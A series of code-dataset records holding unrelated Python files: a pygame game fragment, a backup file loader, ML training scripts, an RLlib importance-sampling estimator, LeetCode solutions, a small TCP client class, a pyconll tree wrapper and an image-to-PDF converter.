0\n\t\t\ty += 35\n\t\tif cont!= 0:\n\t\t\ts += 1\n\t\tcont += 1\n\t\tlista_tazas[i] = ([taza_x, taza_y])\n\n# Spawns more \"enemies\"\n\ndef obstaculos(imagen, pantalla):\n\tx = 0\n\ty = pantalla.get_height() - imagen.get_height()\n\tvelocidad = random.randrange(2, 3)\n\tdireccion = random.randrange(0, 2)\n\n\tif(len(lista_obstaculos) < 3):\n\t\tlista_obstaculos.append([x, y, velocidad, direccion])\n\n\ndef mover_obstaculos(imagen, pantalla):\n\n\tif len(lista_obstaculos) != 0:\n\t\tfor i in range(len(lista_obstaculos)):\n\n\t\t\tif lista_obstaculos[i][0] < (pantalla.get_width() - imagen.get_width()) and lista_obstaculos[i][3] == 0:\n\t\t\t\tlista_obstaculos[i][0] += lista_obstaculos[i][2]\n\t\t\tif lista_obstaculos[i][0] >= pantalla.get_width() - imagen.get_width():\n\t\t\t\tlista_obstaculos[i][3] = 1\n\n\t\t\tif lista_obstaculos[i][0] > 0 and lista_obstaculos[i][3] == 1:\n\t\t\t\tlista_obstaculos[i][0] -= lista_obstaculos[i][2]\n\t\t\tif lista_obstaculos[i][0] <= 0:\n\t\t\t\tlista_obstaculos[i][3] = 0\n\n\ndef reset_obstaculos(lista_obstaculos):\n\tif len(lista_obstaculos)!= 0:\n\t\tfor i in range(len(lista_obstaculos)):\n\t\t\tlista_obstaculos[i][0] = random.randrange(0, 500)\n\t\t\tlista_obstaculos[i][2] = random.randrange(2, 5)\n\t\t\tlista_obstaculos[i][3] = random.randrange(0, 2)\n\n\ndef colision_obstaculos(jugador, imagen, pantalla, gato, lista_obstaculos):\n\n\tif len(lista_obstaculos) != 0:\n\t\trect_jugador = jugador.rect\n\n\t\tancho_obstaculo = imagen.get_width()\n\t\talto_obstaculo = imagen.get_height()\n\t\trect_obstaculo = (0, 0, alto_obstaculo, ancho_obstaculo)\n\n\t\tfor i in range(len(lista_obstaculos)):\n\t\t\trect_obstaculo = (lista_obstaculos[i][0], lista_obstaculos[i][1], alto_obstaculo, ancho_obstaculo)\n\t\t\tif jugador.rect.colliderect(rect_obstaculo):\n\t\t\t\tjugador.perder(pantalla, gato, lista_obstaculos)\n\t\t\t\t\n\t\t\t\tfor i in range(len(lista_obstaculos)): lista_obstaculos[i][0] = 0\n\t\t\t\tjugador.rect.x = pantalla.get_width() / 2 - jugador.imagen.get_width() / 2\n\t\t\t\tjugador.rect.y = pantalla.get_height() - 
jugador.imagen.get_height()\n\t\t\t\treset_tazas(lista_tazas)\n\t\t\t\treset_obstaculos(lista_obstaculos)\n\t\t\t\tjugador.puntos = 0\n\n\n\n#################################################\n\n\nclass Obstaculo(pygame.sprite.Sprite):\n\n\tdef __init__(self, pantalla):\n\t\tsuper().__init__()\n\n\t\tself.imagen1 = pygame.image.load(\"Imagenes/Obstaculos/gato_d1.png\")\n\t\tself.imagen2 = pygame.image.load(\"Imagenes/Obstaculos/gato_d2.png\")\n\t\tself.imagen3 = pygame.image.load(\"Imagenes/Obstaculos/gato_d3.png\")\n\t\tself.imagen4 = pygame.image.load(\"Imagenes/Obstaculos/gato_i1.png\")\n\t\tself.imagen5 = pygame.image.load(\"Imagenes/Obstaculos/gato_i2.png\")\n\t\tself.imagen6 = pygame.image.load(\"Imagenes/Obstaculos/gato_i3.png\")\n\n\t\tself.imagenes = [[self.imagen1, self.imagen2, self.imagen3], [self.imagen4, self.imagen5, self.imagen6]]\n\t\tself.imagen_actual = 0\n\n\t\tself.imagen = self.imagenes[self.imagen_actual][0]\n\n\t\tself.rect = self.imagen.get_rect()\n\t\tself.rect.x = 0\n\t\tself.rect.y = 400\n\t\tself.velocidad = random.randrange(1, 3)\n\n\t\tself.movimiento = False\n\t\tself.orientacion = 0\n\n\t\tself.t = 0\n\n\t\tself.u = 0\n\n\t# Updates the position\n\tdef actualizar_pos(self, pantalla):\n\n\t\tif self.rect.x < (pantalla.get_width() - self.imagen.get_width()) and self.t == 0:\n\t\t\tself.rect.x += self.velocidad\n\t\tif self.rect.x >= pantalla.get_width() - self.imagen.get_width():\n\t\t\tself.t = 1\n\t\t\tself.orientacion = 1\n\n\t\tif self.rect.x > 0 and self.t == 1:\n\t\t\tself.rect.x -= self.velocidad\n\t\tif self.rect.x <= 0:\n\t\t\tself.t = 0\n\t\t\tself.orientacion = 0\n\n\t\tself.siguiente_imagen()\n\n\n\n\t# Draws the image on screen\n\tdef dibujar(self, pantalla):\n\t\tself.imagen = self.imagenes[self.orientacion][self.imagen_actual]\n\t\tpantalla.blit(self.imagen, self.rect)\n\n\tdef siguiente_imagen(self):\n\t\tself.u += 1\n\n\t\tif self.u == 6:\n\t\t\tself.imagen_actual += 1\n\t\t\tself.u = 0\n\n\t\tif self.imagen_actual > (len(self.imagenes)):\n\t\t\tself.imagen_actual = 0\n\n\tdef colision(self, jugador, pantalla, gato, lista_obstaculos):\n\t\tif self.rect.colliderect(jugador):\n\t\t\tjugador.perder(pantalla, gato, lista_obstaculos)\n","sub_path":"Código/tazas.py","file_name":"tazas.py","file_ext":"py","file_size_in_byte":5804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"267907182","text":"import os\nimport logging\nfrom typing import Set, Optional\nfrom datetime import datetime\nfrom modules.classes import ItemMetaData, FileMetaData, DirectoryMetaData\nfrom config.dataobjects import DirectoryConfiguration\n\n\nclass ItemMetaDataLoader(object):\n    def __init__(self, directory_configuration: DirectoryConfiguration):\n        self.directory_configuration = directory_configuration # type: DirectoryConfiguration\n\n    def load(self, parent: Optional[DirectoryMetaData]) -> Set[ItemMetaData]:\n        \"\"\"\n        loads the list of files of a single directory to backup, defined by the DirectoryConfiguration\n        \"\"\"\n        local_dir_content = os.listdir(self.directory_configuration.directory)\n        logging.debug(\"loaded directory content of {}\".format(self.directory_configuration.directory))\n        filematches = set()\n        dirmatches = set()\n        for content_entry in local_dir_content:\n            fqn_content = os.path.join(self.directory_configuration.directory, content_entry)\n            if os.path.isfile(fqn_content):\n                if any(file_entry.matches(content_entry)\n                       for file_entry in self.directory_configuration.get_excluded_files()):\n                    
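# an exclusion match takes precedence, so skip this entry before checking includes\n                    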
logging.debug(\"{} is excluded file.\".format(content_entry))\n continue\n if any(file_entry.matches(content_entry)\n for file_entry in self.directory_configuration.get_included_files()):\n logging.debug(\"{} is included file.\".format(content_entry))\n filematches.add(content_entry)\n if os.path.isdir(fqn_content):\n if any(dir_entry.matches(content_entry)\n for dir_entry in self.directory_configuration.get_excluded_directories()):\n logging.debug(\"{} is excluded directory.\".format(content_entry))\n continue\n if any(dir_entry.matches(content_entry)\n for dir_entry in self.directory_configuration.get_included_directories()):\n logging.debug(\"{} is included directory.\".format(content_entry))\n dirmatches.add(content_entry)\n\n itemmetadata = set()\n for file in filematches:\n logging.debug(\"Creating FileMetaData for {}\".format(file))\n itemmetadata.add(FileMetaData(file,\n datetime.fromtimestamp(os.path.getmtime(\n os.path.join(self.directory_configuration.directory, file)))\n .replace(microsecond=0),\n os.path.getsize(os.path.join(self.directory_configuration.directory, file)),\n parent))\n for directory in dirmatches:\n logging.debug(\"Creating DirectoryMetaData for {}\".format(directory))\n itemmetadata.add(DirectoryMetaData(directory,\n datetime.fromtimestamp(os.path.getmtime(\n os.path.join(self.directory_configuration.directory, directory)))\n .replace(microsecond=0),\n parent))\n\n return itemmetadata\n","sub_path":"localfilehandling/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"334823246","text":"import torch\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\nimport random\n\nfrom graph_tool import generation, spectral\nfrom graph_tool.topology import shortest_distance\n\nimport tools\nimport loaders\nimport network\n\nfrom termcolor import cprint\n\ndef random_degree():\n\treturn 2\n\ndef random_two_nodes(N):\n\treturn random.sample(range(N), 2)\n\ndef are_connected(G, a, b):\n\tM = spectral.adjacency(G)\n\treturn M[a, b]\n\ndef make_problem():\n\tN = 20\n\tG = generation.random_graph(N, random_degree, directed=False)\n\n\tadjM = spectral.adjacency(G).todense()\n\tadjM = torch.tensor(adjM).float()\n\n\ta, b = random_two_nodes(N)\n\tchosen = torch.zeros(N)\n\tchosen[a] = 1\n\tchosen[b] = 1\n\n\tx = torch.cat((adjM, chosen.view(N, 1)), dim=-1)\n\ty = are_connected(G, a, b)\n\n\treturn x, y\n\ndef main():\n\thas_cuda = torch.cuda.is_available()\n\tdev = torch.device('cuda' if has_cuda else 'cpu')\n\n\tsvd_net = network.SVDNet()\n\tsvd_opt = optim.Adam(svd_net.parameters())\n\tprint(f'SVDNet # of params: {tools.nparams(svd_net)}')\n\n\tconv_net = network.ConvNet()\n\tconv_opt = optim.Adam(conv_net.parameters())\n\tprint(f'ConvNet # of params: {tools.nparams(conv_net)}')\n\n\tlin_net = network.LinearNet()\n\tlin_opt = optim.Adam(lin_net.parameters())\n\tprint(f'LinearNet # of params: {tools.nparams(lin_net)}')\n\n\ttrain_ds = loaders.Problems(5000, make_problem)\n\ttest_ds = loaders.Problems(1000, make_problem)\n\n\ttrain_loader = DataLoader(train_ds, batch_size=5, shuffle=True)\n\ttest_loader = DataLoader(test_ds, batch_size=5)\n\n\tnepoch = 5\n\tfor epoch in range(nepoch):\n\t\tprint()\n\t\tprint(f'--- epoch {epoch}')\n\n\t\tcprint('SVDNet', 'red')\n\t\ttools.train(svd_net, dev, train_loader, svd_opt)\n\t\ttools.test(svd_net, dev, test_loader)\n\t\tprint()\n\n\t\tcprint('ConvNet', 'blue')\n\t\ttools.train(conv_net, dev, 
train_loader, conv_opt)\n\t\ttools.test(conv_net, dev, test_loader)\n\t\tprint()\n\n\t\tcprint('LinearNet', 'green')\n\t\ttools.train(lin_net, dev, train_loader, lin_opt)\n\t\ttools.test(lin_net, dev, test_loader)\n\t\tprint()\n\nif __name__ == '__main__':\n\ttorch.set_default_dtype(torch.float32)\n\ttorch.set_default_tensor_type(torch.FloatTensor)\n\n\tmain()\n","sub_path":"connected.py","file_name":"connected.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"310936904","text":"import socket\n\n\nclass Connector:\n    '''\n    simple netcat implementation\n    python2 and python3 supported\n    '''\n\n    def __init__(self, ip, port):\n        self.__ip = ip\n        self.__port = int(port)\n\n    def set_ip(self, ip):\n        self.__ip = ip\n\n    def set_port(self, port):\n        self.__port = int(port)\n\n    def send_data(self, sent_data, timeout=60):\n        try:\n            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            sock.settimeout(timeout)\n            sock.connect((self.__ip, self.__port))\n            sock.sendall(sent_data.encode('UTF-8'))\n            sock.shutdown(socket.SHUT_WR)\n            output = ''\n            listen = True\n            while listen:\n                received_data = sock.recv(1024)\n                output += received_data.decode('UTF-8')\n                if not received_data:\n                    listen = False\n            sock.close()\n            return output.strip()\n        except socket.timeout as err:\n            raise Exception(err)\n        except socket.error as err:\n            raise Exception(err)\n","sub_path":"connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"238819035","text":"class Solution:\n    def replaceWords(self, dict, sentence):\n        \"\"\"\n        :type dict: List[str]\n        :type sentence: str\n        :rtype: str\n        \"\"\"\n        sorted_dict = sorted(dict, key=len)\n        sentence = sentence.split()\n        for i in range(len(sentence)):\n            for w in sorted_dict:\n                if sentence[i].startswith(w):\n                    sentence[i] = w\n                    break\n        return ' '.join(sentence)\n\n\nif __name__ == \"__main__\":\n    solution = Solution()\n    testdata1 = [\"cat\", \"bat\", \"rat\"]\n    testdata2 = \"the cattle was rattled by the battery\"\n    result = solution.replaceWords(testdata1, testdata2)\n    print(result)","sub_path":"600-700/648_replace_words.py","file_name":"648_replace_words.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"215798064","text":"from ray.rllib.offline.estimators.off_policy_estimator import OffPolicyEstimator\nfrom ray.rllib.utils.annotations import override, DeveloperAPI\nfrom ray.rllib.utils.typing import SampleBatchType\nfrom ray.rllib.utils.numpy import convert_to_numpy\nfrom ray.rllib.utils.policy import compute_log_likelihoods_from_input_dict\nfrom typing import Dict, Any\nimport numpy as np\n\n\n@DeveloperAPI\nclass ImportanceSampling(OffPolicyEstimator):\n    \"\"\"The step-wise IS estimator.\n\n    Let s_t, a_t, and r_t be the state, action, and reward at timestep t.\n\n    For behavior policy \\pi_b and evaluation policy \\pi_e, define the\n    cumulative importance ratio at timestep t as:\n    p_t = \\prod_{t'=0}^t (\\pi_e(a_{t'} | s_{t'}) / \\pi_b(a_{t'} | s_{t'})).\n\n    This estimator computes the expected return for \\pi_e for an episode as:\n    V^{\\pi_e}(s_0) = \\sum_t \\gamma ^ {t} * p_t * r_t\n    and returns the mean and standard deviation over episodes.\n\n    For more information refer to https://arxiv.org/pdf/1911.06854.pdf\"\"\"\n\n    @override(OffPolicyEstimator)\n    def estimate(self, batch: 
SampleBatchType) -> Dict[str, Any]:\n \"\"\"Compute off-policy estimates.\n\n Args:\n batch: The SampleBatch to run off-policy estimation on\n\n Returns:\n A dict consists of the following metrics:\n - v_behavior: The discounted return averaged over episodes in the batch\n - v_behavior_std: The standard deviation corresponding to v_behavior\n - v_target: The estimated discounted return for `self.policy`,\n averaged over episodes in the batch\n - v_target_std: The standard deviation corresponding to v_target\n - v_gain: v_target / max(v_behavior, 1e-8), averaged over episodes\n - v_gain_std: The standard deviation corresponding to v_gain\n \"\"\"\n batch = self.convert_ma_batch_to_sample_batch(batch)\n self.check_action_prob_in_batch(batch)\n estimates = {\"v_behavior\": [], \"v_target\": [], \"v_gain\": []}\n for episode in batch.split_by_episode():\n rewards, old_prob = episode[\"rewards\"], episode[\"action_prob\"]\n log_likelihoods = compute_log_likelihoods_from_input_dict(\n self.policy, episode\n )\n new_prob = np.exp(convert_to_numpy(log_likelihoods))\n\n # calculate importance ratios\n p = []\n for t in range(episode.count):\n if t == 0:\n pt_prev = 1.0\n else:\n pt_prev = p[t - 1]\n p.append(pt_prev * new_prob[t] / old_prob[t])\n\n # calculate stepwise IS estimate\n v_behavior = 0.0\n v_target = 0.0\n for t in range(episode.count):\n v_behavior += rewards[t] * self.gamma ** t\n v_target += p[t] * rewards[t] * self.gamma ** t\n\n estimates[\"v_behavior\"].append(v_behavior)\n estimates[\"v_target\"].append(v_target)\n estimates[\"v_gain\"].append(v_target / max(v_behavior, 1e-8))\n estimates[\"v_behavior_std\"] = np.std(estimates[\"v_behavior\"])\n estimates[\"v_behavior\"] = np.mean(estimates[\"v_behavior\"])\n estimates[\"v_target_std\"] = np.std(estimates[\"v_target\"])\n estimates[\"v_target\"] = np.mean(estimates[\"v_target\"])\n estimates[\"v_gain_std\"] = np.std(estimates[\"v_gain\"])\n estimates[\"v_gain\"] = np.mean(estimates[\"v_gain\"])\n return estimates\n","sub_path":"rllib/offline/estimators/importance_sampling.py","file_name":"importance_sampling.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"554004122","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\"\"\"Page 30-32, Perceptron algorithm,\n\nwith an OR logic demo, predict it's outputs and calculate it's Confusion matrix\n\"\"\"\n# Code from Chapter 2 of Machine Learning: An Algorithmic Perspective\n# by Stephen Marsland\n# (http://seat.massey.ac.nz/personal/s.r.marsland/MLBook.html)\n\n# You are free to use, change, or redistribute the code in any way you wish for\n# non-commercial purposes, but please maintain the name of the original author.\n# This code comes with no warranty of any kind.\n\n# Stephen Marsland, 2008\nimport numpy as np\n\nclass pcn(object):\n \"\"\" A basic Perceptron (the same pcn.py except with the weights printed\n and it does not reorder the inputs)\"\"\"\n\n def __init__(self,inputs,targets):\n \"\"\" Constructor \"\"\"\n # Set up network size\n #if ndim(inputs)>1:\n #self.nIn = shape(inputs)[1]\n #else:\n #self.nIn = 1\n\n #if ndim(targets)>1:\n #self.nOut = shape(targets)[1]\n #else:\n #self.nOut = 1\n self.nIn = inputs.shape[1] if inputs.ndim > 1 else 1\n self.nOut = targets.shape[1] if targets.ndim > 1 else 1\n\n self.nData = inputs.shape[0]\n\n # Initialise network\n self.weights = np.random.rand(self.nIn+1,self.nOut) * 0.1 - 0.05\n # self.weights = 
np.zeros((self.nIn+1,self.nOut))\n\n def pcntrain(self,inputs,targets,eta,nIterations):\n \"\"\" Train the thing \"\"\"\n # Add the inputs that match the bias node\n inputs = np.concatenate((inputs,-np.ones((self.nData,1))),axis=1)\n\n # Training\n for n in range(nIterations):\n\n self.outputs = self.pcnfwd(inputs);\n self.weights += eta*np.dot(inputs.transpose(), targets-self.outputs)\n print( \"Iteration: \", n)\n print( self.weights)\n\n activations = self.pcnfwd(inputs)\n print(\"Final outputs are:\")\n print( activations )\n #return self.weights\n\n def pcnfwd(self,inputs):\n \"\"\" Run the network forward \"\"\"\n\n outputs = np.dot(inputs,self.weights)\n\n # Threshold the outputs\n return np.where(outputs>0,1,0)\n\n\n def confmat(self,inputs,targets):\n \"\"\"Confusion matrix\"\"\"\n\n # Add the inputs that match the bias node\n inputs_bias = np.concatenate((inputs,-np.ones((self.nData,1))),axis=1)\n outputs = np.dot(inputs_bias, self.weights)\n\n nClasses = targets.shape[1]\n\n if nClasses==1:\n nClasses = 2\n outputs = np.where(outputs>0,1,0)\n else:\n # 1-of-N encoding\n outputs = np.argmax(outputs,1)\n targets = np.argmax(targets,1)\n\n cm = np.zeros((nClasses,nClasses))\n for i in range(nClasses):\n for j in range(nClasses):\n cm[i,j] = np.sum(np.where(outputs==i,1,0) *\n np.where(targets==j,1,0))\n\n print(cm)\n print(np.trace(cm)/np.sum(cm))\ndef xor_logic(is3d=False):\n \"\"\" Run XOR logic functions \"\"\"\n if is3d:\n inputs = np.array([[0,0,1],[0,1,0],[1,0,0],[1,1,0]])\n else:\n inputs = np.array([[0,0],[0,1],[1,0],[1,1]])\n targets = np.array([[0],[1],[1],[0]])\n p = pcn(inputs, targets)\n p.pcntrain(inputs, targets, .25, 15)\n # predict it's outputs\n inputs_bias = np.concatenate((inputs, -np.ones((inputs.shape[0],1))),\n axis=1)\n print(p.pcnfwd(inputs_bias))\n # calculate it's Confusion matrix\n p.confmat(inputs, targets)\n \ndef main():\n \"\"\" Run OR logic functions \"\"\"\n inputs = np.array([[0,0],[0,1],[1,0],[1,1]])\n targets = np.array([[0],[1],[1],[1]])\n p = pcn(inputs, targets)\n p.pcntrain(inputs, targets, .25, 6)\n # predict it's outputs\n inputs_bias = np.concatenate((inputs, -np.ones((inputs.shape[0],1))),\n axis=1)\n print(p.pcnfwd(inputs_bias))\n # calculate it's Confusion matrix\n p.confmat(inputs, targets)\n\n # Run XOR logic functions\n xor_logic()\n\n # Run XOR logic functions, 3D version\n xor_logic(is3d=True)\nif __name__ == \"__main__\":\n main() ","sub_path":"Machine Learning An Algorithmic Perspective/ch3Neurons Neural Networks and Linear Discriminants/pcn_logic_eg.py","file_name":"pcn_logic_eg.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"110638699","text":"\"\"\"\nMerge k sorted linked lists and return it as one sorted list. Analyze and describe its complexity.\n\nExample:\n\nInput:\n[\n 1->4->5,\n 1->3->4,\n 2->6\n]\nOutput: 1->1->2->3->4->4->5->6\n\"\"\"\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n# Brute force. Nlog(N). N space. N = total number of nodes\nclass Solution(object):\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n nums = []\n for l in lists:\n while l:\n nums.append(l.val)\n l = l.next\n \n head = runner = ListNode(0)\n for num in sorted(nums):\n runner.next = ListNode(num)\n runner = runner.next\n\n return head.next\n\n\n\n# Merge in one list at a time. 
O(NK) time where N is total nodes\n# and k is number of lists.\n# 5332ms. 7th percentile.\n\n# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution:\n    def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n        if len(lists) == 0:\n            return None\n        elif len(lists) == 1:\n            return lists[0]\n        \n        head = self._mergeTwoLists(lists[0], lists[1])\n        for listHead in lists[2:]:\n            head = self._mergeTwoLists(head, listHead)\n        \n        return head\n    \n    \n    def _mergeTwoLists(self, first, second):\n        head = merger = ListNode(-1)\n        \n        while first or second:\n            if first and not second:\n                merger.next = first\n                break\n            elif second and not first:\n                merger.next = second\n                break\n            elif first.val <= second.val:\n                merger.next = first\n                first = first.next\n            elif second.val < first.val:\n                merger.next = second\n                second = second.next\n            \n            merger = merger.next\n        \n        return head.next\n\n\n# Improve the merge in one list at a time approach with divide\n# and conquer. Gives O(Nlog(K)) time and constant space\n# 128ms. 53rd percentile.\n# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution:\n    def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n        if len(lists) == 0:\n            return None\n        \n        # Method 1:\n        \"\"\" \n        Cool idea...we're merging 0-1, 2-3, 4-5, 6-7,....\n        Then 0-2, 4-6\n        Then 0-4\n        So rather than make new lists, we keep merging the second lists into the \n        firsts. At the end lists[0] has the final result.\n        \"\"\"\n        interval = 1\n        while interval < len(lists):\n            for i in range(0, len(lists) - interval, interval*2):\n                lists[i] = self._mergeTwoLists(lists[i], lists[i + interval])\n            interval *= 2\n\n\n        \"\"\"\n        A cleaner way to do the above. It overwrites the lists though. \n        \"\"\"\n        # while 1 < len(lists):\n        #     lists = [ self._mergeTwoLists(*lists[i:i+2]) for i in range(0, len(lists), 2) ]\n        \n        return lists[0]\n    \n    \n    def _mergeTwoLists(self, first, second=None):\n        head = merger = ListNode(-1)\n        \n        while first or second:\n            if first and not second:\n                merger.next = first\n                break\n            elif second and not first:\n                merger.next = second\n                break\n            elif first.val <= second.val:\n                merger.next = first\n                first = first.next\n            elif second.val < first.val:\n                merger.next = second\n                second = second.next\n            \n            merger = merger.next\n        \n        return head.next\n\n\n\"\"\"\nNotes:\n\nThere are a lot of ways to do this problem.\n\n1) Easiest is brute force. Just combine all the values into a single list,\nsort it, and then produce a list using that list of numbers. \n\n2) March through the lists. At each step, compare the nodes at the front of \nthe k lists. Take the smallest one. This requires NK work where K is the number of lists\nand N is the total number of nodes. \n\nIt takes N space if you make a new list. O(1) space if you just interleave the nodes\n\n\n3) Same as 2, except the comparisons use a priority queue. The comparison cost\ndrops to log(K), so Nlog(K) total. \nNew linked list -> N space\nCombine the lists -> K space (priority queue will have K elements in it at any one time)\n\n\n4) This is the best approach in that it's Nlog(k) but constant space. It's a bit trickier,\nthough the idea is cool. In my opinion it's another example of merge-sort-esque techniques\nworking surprisingly well with linked lists. \n\nAt the core, we maintain a final list and merge in one list at a time. Then we do this with\na divide and conquer approach. 
Details:\n\nFirst, note that merging two sorted linked lists is straightforward. It's easy to imagine\njust merging in a list at a time. We do this k times and process O(N) nodes in total. Total\ntime complexity is O(KN). Space complexity is O(1) if we merge the lists rather than\nmake a new one.\n\nNow bring in the divide and conquer bit. Idea is to pair up the lists, merge the pairs, then\nmerge the resulting lists and so on.\n\nThis is Nlog(k) time complexity. To see why, imagine\n\n4 lists, each with 16 elements. \n\nWe merge them into two lists of 32 elements.\n\nThen merge those into one list of 64 elements. \n\nThe number of merge operations is equal to Log2(K). Each of these merges takes at\nmost O(N) time. So log2(K)*N time in total.\n\nA cool aside about this method is the indexing used in repeatedly merging in the lists\n\"\"\"","sub_path":"companies-leetcode/amazon/linked-lists/merge-k-sorted-lists.py","file_name":"merge-k-sorted-lists.py","file_ext":"py","file_size_in_byte":5825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"118151948","text":"\"\"\"\n6. Create a list with the names of friends and colleagues. Search for the\nname ‘John’ using a for loop. Print ‘not found’ if you didn't find it.\n\"\"\"\n\nnames = [\"Reebika\", \"Tanusha\", \"Jaya\", \"Gita\", \"John\"]\n\nfor name in names:\n if name == 'John':\n print(\"John Found!\")\n break\nelse:\n print(\"Name not Found\")\n","sub_path":"Examples/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"513678342","text":"\"\"\"\nCreate the SentenceTree type as a wrapper around a sentence that constructs a\ntree as well to traverse the sentence in a new way.\n\"\"\"\n\nfrom pyconll.conllable import Conllable\n\nfrom . import Tree\n\n\nclass SentenceTree(Conllable):\n \"\"\"\n A Tree wrapper around a sentence. This type will take in an existing serial\n sentence, and create a tree representation from it. This type holds both the\n sentence and the tree representation of the sentence. Note that an empty\n sentence input will have no data and no children.\n \"\"\"\n\n @staticmethod\n def _create_tree(sentence, root, children_tokens):\n \"\"\"\n Method to create a tree from a sentence given the root token.\n\n Args:\n sentence: The sentence to construct the tree from.\n root: The root token to start the tree at.\n children_tokens: A dictionary from token id to children tokens.\n\n Returns:\n A Tree constructed given the sentence structure.\n \"\"\"\n try:\n tokens = children_tokens[root.id]\n trees = list(\n map(\n lambda token: SentenceTree._create_tree(sentence, token, children_tokens),\n tokens))\n except KeyError:\n trees = None\n\n return Tree(sentence[root.id], trees)\n\n def __init__(self, sentence):\n \"\"\"\n Creates a new SentenceTree given the sentence.\n\n Args:\n sentence: The sentence to wrap and construct a tree from.\n \"\"\"\n self._sentence = sentence\n children_tokens = {}\n\n root_token = None\n for token in self.sentence:\n parent_key = token.head\n\n try:\n children_tokens[parent_key].append(token)\n except KeyError:\n children_tokens[parent_key] = [token]\n\n if token.head == '0':\n root_token = token\n\n root = SentenceTree._create_tree(self.sentence, root_token, children_tokens) \\\n if root_token else Tree(root_token, None)\n\n self._tree = root\n\n @property\n def sentence(self):\n \"\"\"\n Provides the unwrapped sentence. 
This property is readonly.\n\n Returns:\n The unwrapped sentence.\n \"\"\"\n return self._sentence\n\n @property\n def tree(self):\n \"\"\"\n Provides the constructed tree. This property is readonly.\n\n Returns:\n The constructed tree.\n \"\"\"\n return self._tree\n\n def conll(self):\n \"\"\"\n Outputs the provided tree into CoNLL format.\n\n Returns:\n The CoNLL formatted string.\n \"\"\"\n return self.sentence.conll()\n","sub_path":"pyconll/tree/sentencetree.py","file_name":"sentencetree.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"465074817","text":"import img2pdf\nimport os\nfrom PIL import Image\nfrom helperFunction.transform import four_point_transform\nfrom skimage.filters import threshold_local\nimport numpy as np\nimport argparse\nimport cv2\nimport imutils\nfrom PyPDF2 import PdfFileMerger, PdfFileReader\n\n\n\ndef pdfMerger(files, folderName):\n mergedObject = PdfFileMerger()\n for pdf in os.listdir(folderName):\n mergedObject.append(PdfFileReader(open(folderName+\"/\"+pdf, 'rb')))\n mergedObject.write(folderName+\".pdf\")\n\ndef i2pconverter(files, folderName):\n\n for image in os.listdir(folderName):\n remove_transparency(folderName+\"/\"+image)\n\n try:\n print(\"i2pcon \",folderName)\n os.remove(folderName)\n except Exception as e:\n pass\n pdfname = folderName + \".pdf\"\n with open(pdfname,'wb') as f:\n f.write(img2pdf.convert([folderName+\"/\"+i for i in os.listdir(folderName)]))\n\n\ndef i2pconverterAutoCrop(files, folderName):\n\n for image in os.listdir(folderName):\n remove_transparency(folderName+\"/\"+image)\n \n for image in os.listdir(folderName):\n autoCropHelper(folderName+\"/\"+image)\n\n try:\n print(\"i2pcon \",folderName)\n os.remove(folderName)\n except Exception as e:\n pass\n pdfname = folderName + \".pdf\"\n with open(pdfname,'wb') as f:\n f.write(img2pdf.convert([folderName+\"/\"+i for i in os.listdir(folderName)]))\n \n\n\ndef remove_transparency(image, bg_colour=(255, 255, 255)):\n im = Image.open(image)\n \n # Only process if image has transparency (http://stackoverflow.com/a/1963146)\n if im.mode in ('RGBA', 'LA') or (im.mode == 'P' and 'transparency' in im.info):\n newimg = im.convert('RGB')\n newimg.save(image, 'PNG', quality=80)\n\n else:\n pass\n\n\ndef autoCropHelper(img):\n image = cv2.imread(img)\n ratio = image.shape[0] / 500.0\n orig = image.copy()\n image = imutils.resize(image, height = 500)\n\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (5, 5), 0)\n edged = cv2.Canny(gray, 75, 200)\n\n cnts = cv2.findContours(edged.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:5]\n\n for c in cnts:\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.02 * peri, True)\n\n if len(approx) == 4:\n screenCnt = approx\n break\n \n try:\n warped = four_point_transform(orig, screenCnt.reshape(4, 2) * ratio)\n\n warped = cv2.cvtColor(warped, cv2.COLOR_BGR2GRAY)\n T = threshold_local(warped, 11, offset = 10, method = \"gaussian\")\n warped = (warped > T).astype(\"uint8\") * 255\n\n cv2.imwrite(img, imutils.resize(warped, height = 650))\n except Exception as e:\n print(\"Error: \", e)\n cv2.imwrite(img, 